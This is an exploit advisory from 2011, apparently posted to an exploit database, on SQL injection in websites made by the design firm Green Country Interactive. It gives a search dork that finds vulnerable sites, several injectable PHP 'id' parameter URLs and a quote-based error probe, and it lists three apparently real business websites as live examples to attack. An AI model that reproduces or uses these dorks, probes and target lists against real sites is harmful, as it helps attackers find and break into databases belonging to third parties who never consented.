Green Country Interactive.. SQL injection Vulnerability



EKU-ID: 506 CVE: OSVDB-ID:
Author: k's0uR! Published: 2011-06-14 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Exploit Title : Green Country Interactive.. SQL injection Vulnerability
[+] Date : 10 June 2011
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Design & Developed by: Green Country Interactive "
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Exploit:


››http://localhost/service.php?id={VaLid id }
[Or]
››http://localhost/portfolio_detail.php?id={VaLid id }
[Or]
››http://localhost/listing_detail.php?id={VaLid id }
[Or]
››http://localhost/product.php?id={VaLid id }
...

››Check all .php?*= mostly all vul.. to sqli.!
›› use your head..!!

››http://localhost/service.php?id=1' » {sql Error}  (^_^)
››http://localhost/service.php?id= SQL here

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Example:

››http://firstchoicelawns.biz/service.php?id=8'
››http://www.bucketmouthjigs.com/product.php?id=10'
››http://kidsdirectorytulsa.com/listing_detail.php?id=16'

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]Greetz To : 4ll 1nj3ctor team... 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued..